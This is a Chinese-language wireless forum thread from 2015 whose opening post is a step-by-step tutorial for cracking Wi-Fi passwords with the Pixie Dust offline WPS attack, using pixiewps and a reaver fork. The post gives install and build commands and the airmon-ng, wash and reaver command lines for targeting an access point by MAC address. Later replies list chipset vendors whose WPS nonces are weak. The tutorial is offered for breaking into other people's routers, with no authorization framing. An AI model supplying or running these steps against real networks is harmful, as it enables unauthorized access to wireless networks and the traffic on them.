ubnt解决方案
查看: 45229|回复: 121

pixiewps reaver WPS离线PJ 详细教程

  [复制链接]

559

回帖

1311

积分

197 小时

在线时间

上尉

注册时间
2011-4-24
金币
718 个
威望
0 个
荣誉
0 个
累计签到:6 天
连续签到:1 天
[LV.20]漫游旅程
发表于 2015-5-22 17:54 |显示全部楼层
本帖最后由 zacp 于 2015-5-22 17:56 编辑

既然坛子里的朋友想看,就抓紧放上来

工具说明:
pixiewps 是一个wps离线攻击工具,利用了芯片上的算法漏洞,成功率不是很高,具体可以看
http://www.anywlan.com/thread-356695-1-1.html  wps 离线攻击.

英文好的可以看
https://forums.kali.org/showthre ... fline-WPS-Attack%29  WPS Pixie Dust Attack (Offline WPS Attack)

reaver 1.5.2  这个是社区维护的reaver的分支,之所以使用这个版本是因为它加入了一个-K 参数 可以调用pixiewps来得到pin码,然后直接出密码,而不用输入命令。
https://github.com/t6x/reaver-wps-fork-t6x

安装

CDLinux
http://www.anywlan.com/thread-362108-1-1.html  pixiewps + reaver-wps-fork-t6x of cdlinux 0.9.7.1

感谢open2012大神

Kali Linux

apt-get install reaver pixiewps
如果你会使用git 也可以从github下载源码编译
pixiewps 1.1
cd /tmp
git clone https://github.com/wiire/pixiewps
cd pixiewps
make & make install

reaver 1.5.2 编译方法同上,先./configure
make & make install
https://github.com/t6x/reaver-wps-fork-t6x

Wifislax

可以使用我打包好的模块
http://www.anywlan.com/thread-362269-1-1.html  //这里下载
也可以从github上编译,和kali linux下是一样的

使用
首先确保你的无线网卡能工作,进入monitor模式
airmon-ng start wlan0

使用wash -i mon0 来扫描开WPS的AP ctrl+c停止

使用命令
reaver -i mon0 -b 想要攻击的AP'MAC地址 -v  -K 1  
如果存在该漏洞的话,很快就能出pin和密码了

优点
几乎是秒破的节奏!
缺点
成功率着实不高




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
文明CW,他好我也好

559

回帖

1311

积分

197 小时

在线时间

上尉

注册时间
2011-4-24
金币
718 个
威望
0 个
荣誉
0 个
累计签到:6 天
连续签到:1 天
[LV.20]漫游旅程
发表于 2015-5-25 16:59 |显示全部楼层
马上成功 发表于 2015-5-25 15:20
请问是那些路由器有这个漏洞?

那要看哪些路由器采用这些有问题的芯片了
Vulnerable Manufacturers
-Ralink: E-S1 = E-S2 = 0  //雷凌
-Realtek: E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time  //瑞昱yu
-Broadcom: E-S1 + E-S2 are generated from the same PRNG that generated the N1 Enrollee Nonce  //博通
大神的说法是
雷凌芯片ap,少量博通芯片ap,atheros芯片ap不受影响.TP-LINK用atheros芯片的比较多,...
文明CW,他好我也好
回复

使用道具 举报

242

回帖

1748

积分

433 小时

在线时间

上尉

注册时间
2009-6-7
金币
1424 个
威望
3 个
荣誉
0 个

尚未签到

发表于 2015-5-22 18:01 |显示全部楼层
本帖最后由 mouse1rat1 于 2015-5-22 18:06 编辑

感谢分享,下来试试看!我是U盘启动的CDLINUX  0.9.6.1,我的LOCAL文件夹下没有REAVER.TGZ???小白压力大,楼主能否详细说说。谢谢!
Reports that say that something hasn't happened are always interesting to me, because as we know, there are known knowns; there are things we know we . Pppoe killer:modify the value of  “vpi vci”
回复

使用道具 举报

1万

回帖

7万

积分

4374 小时

在线时间

中将

水滴试水员

灌水天才

注册时间
2014-4-19
金币
56169 个
威望
355 个
荣誉
0 个
累计签到:2806 天
连续签到:1 天
[LV.2920]超级粉丝
发表于 2015-5-22 18:02 |显示全部楼层
“优点
几乎是秒破的节奏!
缺点
成功率着实不高”

实事求是,顶帖。
江城五月落梅花
回复

使用道具 举报

94

回帖

845

积分

551 小时

在线时间

中尉

注册时间
2011-9-20
金币
685 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2015-5-22 18:06 来自手机 |显示全部楼层
楼主,有哪些芯片啊?
回复

使用道具 举报

1105

回帖

1268

积分

837 小时

在线时间

上尉

注册时间
2015-5-1
金币
45 个
威望
1 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2015-5-22 18:10 来自手机 |显示全部楼层
这贴子可以是精华   了   
回复

使用道具 举报

417

回帖

1443

积分

788 小时

在线时间

上尉

注册时间
2011-5-28
金币
884 个
威望
4 个
荣誉
0 个
累计签到:98 天
连续签到:0 天
[LV.100]试剑无线
发表于 2015-5-22 18:10 |显示全部楼层
做个记号,,,,,
回复

使用道具 举报

312

回帖

1704

积分

279 小时

在线时间

上尉

注册时间
2015-5-14
金币
1346 个
威望
2 个
荣誉
0 个
累计签到:125 天
连续签到:0 天
[LV.200]无线新星
发表于 2015-5-22 18:18 |显示全部楼层
支持一下拉了,还不错呢
回复

使用道具 举报

53

回帖

825

积分

175 小时

在线时间

中尉

注册时间
2014-5-3
金币
738 个
威望
0 个
荣誉
0 个
累计签到:87 天
连续签到:0 天
[LV.100]试剑无线
发表于 2015-5-22 18:42 |显示全部楼层
看看叫师傅贰看认识他根本去
回复

使用道具 举报

615

回帖

4923

积分

747 小时

在线时间

少校

注册时间
2015-2-21
金币
4183 个
威望
1 个
荣誉
1 个
累计签到:422 天
连续签到:1 天
[LV.730]常住居民
发表于 2015-5-22 18:52 |显示全部楼层
实际作用不大,但也算一种PJ方法啦,可一试
回复

使用道具 举报

334

回帖

2823

积分

170 小时

在线时间

少校

注册时间
2013-2-21
金币
2432 个
威望
2 个
荣誉
1 个
累计签到:221 天
连续签到:0 天
[LV.365]无线熟人
发表于 2015-5-22 19:00 |显示全部楼层
monitor模式是什么
回复

使用道具 举报

559

回帖

1311

积分

197 小时

在线时间

上尉

注册时间
2011-4-24
金币
718 个
威望
0 个
荣誉
0 个
累计签到:6 天
连续签到:1 天
[LV.20]漫游旅程
发表于 2015-5-22 19:17 |显示全部楼层

混杂模式。。。。
文明CW,他好我也好
回复

使用道具 举报

559

回帖

1311

积分

197 小时

在线时间

上尉

注册时间
2011-4-24
金币
718 个
威望
0 个
荣誉
0 个
累计签到:6 天
连续签到:1 天
[LV.20]漫游旅程
发表于 2015-5-22 19:20 |显示全部楼层
hda 发表于 2015-5-22 18:06
楼主,有哪些芯片啊?

忘说了,谢谢提醒,官方的说法是
Vulnerable Manufacturers
-Ralink: E-S1 = E-S2 = 0  //雷凌
-Realtek: E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time  //瑞昱yu
-Broadcom: E-S1 + E-S2 are generated from the same PRNG that generated the N1 Enrollee Nonce  //博通
大神的说法是
雷凌芯片ap,少量博通芯片ap,atheros芯片ap不受影响.TP-LINK用atheros芯片的比较多,...
文明CW,他好我也好
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-7-29 11:21

返回顶部 返回列表